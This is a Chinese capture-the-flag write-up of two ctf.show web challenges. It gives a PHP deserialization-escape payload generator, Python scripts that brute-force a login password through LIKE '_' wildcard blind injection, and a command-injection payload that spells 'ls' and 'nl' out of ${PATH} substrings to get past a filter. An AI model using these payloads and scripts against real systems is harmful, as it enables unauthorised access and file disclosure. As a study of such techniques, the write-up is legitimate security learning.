文章目录
0x01 web1_此夜圆 (反序列化逃逸)
下载附件拿到源码,是反序列化逃逸的题
懒得算,直接遍历Firebasky的数量
<?php
error_reporting(0);
class a
{
public $uname;
public $password;
public function __construct($uname,$password)
{
$this->uname=$uname;
$this->password=$password;
}
public function __wakeup()
{
if($this->password==='yu22x')
{
echo "success!";
}
else
{
echo 'wrong password';
}
}
}
function filter($string){
return str_replace('Firebasky','Firebaskyup',$string);
}
$o = new a("test",1);
$encode = filter(serialize($o));
echo "正常格式:".$encode."\n";
//遍历payload:Firebasky乘以i加";s:8:"password";s:5:"yu22x";}
for ($i=0; $i < 40; $i++) {
$payload = str_repeat("Firebasky",$i).'";s:8:"password";s:5:"yu22x";}';
$o = new a($payload,1);
$encode = filter(serialize($o));
$decode = unserialize($encode);
if($decode->password=="yu22x"){
echo "\npayload为:".$payload;
}
}
结果:
正常格式:O:1:"a":2:{s:5:"uname";s:4:"test";s:8:"password";i:1;}
wrong passwordflag
payload为:FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}[Finished in 0.1s]
0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母)
在登录页面的源代码中可以看到一些提示
用户名为yu22x,查询语句为like,可以使用通配符%
和_
。
百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。
fuzz了一下,被过滤的有这些字符,%号被过滤了,我们可以使用_
写个脚本测试一下密码长度
import requests
headers = {
"Accept": "*/*",
"Accept-Encoding": "gzip, deflate",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
data = {
"username": "yu22x",
"password": "{0}"
}
req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("a")})
print(len(req.text))
for i in range(1, 50):
req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("_" * i)})
if len(req.text) != 52:
print("[+] 长度为", i)
长度为32
然后用32个_去登录,yu22x
,________________________________
I have filtered all the characters. Why can you come in? get out!
看来是必须用真实的密码登录,写个脚本跑一下
import requests
headers = {
"Accept": "*/*",
"Accept-Encoding": "gzip, deflate",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
data = {
"username": "yu22x",
"password": "{0}"
}
fuzz = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
res = ""
for i in range(32):
for j in fuzz:
req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format(res+j+"_"*(31-i))})
# print(res+j+"_"*(32-i))
if "wrong" not in req.text:
res += j
print(res)
break
得到密码67815b0c009ee970fe4014abaa3Fa6A0
然后后面的都没想到,最开始还以为是ssrf,看了题解才知道怎么做
利用环境变量构造ls
0;${PATH:5:1}${PATH:11:1}
构造nl
0;${PATH:14:1}${PATH:5:1} ????.???